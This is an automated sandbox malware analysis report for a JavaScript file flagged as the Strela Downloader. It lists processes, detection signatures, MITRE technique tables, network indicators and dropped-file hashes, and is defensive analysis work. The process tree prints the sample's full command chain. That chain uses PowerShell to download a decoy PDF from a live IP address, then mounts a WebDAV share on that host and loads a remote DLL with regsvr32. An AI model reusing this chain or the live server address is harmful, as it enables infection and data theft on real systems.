Windows
Analysis Report
3253418218787826771.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7344 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\32534 1821878782 6771.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7396 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\151 1317102141 48.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7404 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7448 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7620 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7828 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 8056 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 28 --field -trial-han dle=1756,i ,128946623 1684103191 8,23381840 7548491419 2,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7900 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
3% | ReversingLabs |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588016 |
Start date and time: | 2025-01-10 20:33:43 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 0s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 3253418218787826771.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/59@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 52.22.41.97, 3.233.129.217, 52.6.155.20, 3.219.243.226, 2.16.168.107, 2.16.168.105, 162.159.61.3, 172.64.41.3, 184.28.90.27, 23.209.209.135, 23.55.235.250, 23.55.235.178, 23.55.235.186, 23.54.161.81, 23.55.235.177, 23.55.235.248, 192.168.2.4, 52.149.20.212, 96.17.64.171, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
14:34:39 | API Interceptor | |
14:34:43 | API Interceptor | |
14:34:43 | API Interceptor | |
14:34:55 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3073541101098571 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrL:KooCEYhgYEL0In |
MD5: | 2F0C60E37DAE4567E20499534670861D |
SHA1: | 6765111F3435F5529F52B7110BD16C09F184A9EB |
SHA-256: | B81B4CA0B41588F2170921EC704D09E56C0FE6B4CFBBB3172E7ECE5700D94E75 |
SHA-512: | 311B12D0574E982D0D08485914E3BCCE8B525F75E0DC0D7D2C1CA1D02A4F64EAFB6D4E51468B9792C1EE6FB2DB77CF9EA63106BF0786C8E93818E4F2E02D44A1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.42216937441916164 |
Encrypted: | false |
SSDEEP: | 1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO |
MD5: | DE7465D08890FF6E8B80A2AC4658BEE6 |
SHA1: | D6E017FD300C2DDE4C81D88FDDB92239D67AD3C9 |
SHA-256: | 0AF678F7AF35C4644BB2955E2405DEEB3641FAA87D8C1AFB40E5C88A5EA8B38F |
SHA-512: | 77FDEC1D9BDA4342B96855DD6DECC2AD8B8415F91076BD9FE31E31E3E79A20814FD25F63B7239306C1E5FC55CBB4E58B0F13A61981135F0EE037785DEDE9E22E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07732026304783021 |
Encrypted: | false |
SSDEEP: | 3:2+Ye5Vijn13a/mRgRCLollcVO/lnlZMxZNQl:2+z5w53qmAOewk |
MD5: | 537BB6BCAABF2AD2805E42BCF1D43A43 |
